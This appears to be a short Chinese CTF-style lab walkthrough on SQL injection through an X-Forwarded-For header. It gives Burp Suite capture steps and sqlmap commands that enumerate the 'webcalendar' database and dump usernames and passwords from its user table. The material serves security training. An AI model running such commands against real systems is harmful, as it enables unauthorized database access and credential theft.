准备工具
Burp suite
Sqlmap
实训目标
1、掌握SQL注入的基本原理;
2、了解服务器获取客户端IP的方式;
3、了解SQL注入的工具使用;
解题方向
对登录表单的各参数进行测试,找到SQL注入点,对数据库内容进行读取,找到账号与密码。
操作步骤
1.首先打开burp抓包,开启代理,代理开启点击登陆 抓取数据
2.将抓取到的数据发送到Repeater
添加x-forwarded-for:*
将raw的信息存为txt文件,如下图所示
使用Sqlmap
爆出当前的数据库
sqlmap -r 1.txt --current-db --batch
爆表名
sqlmap -r 1.txt -D webcalendar -T user --columns --batch
爆表中的字段
sqlmap -r 1.txt -D webcalendar -T user -C username,password --dump --batch
爆破出后台账号密码
登陆后台获得Key
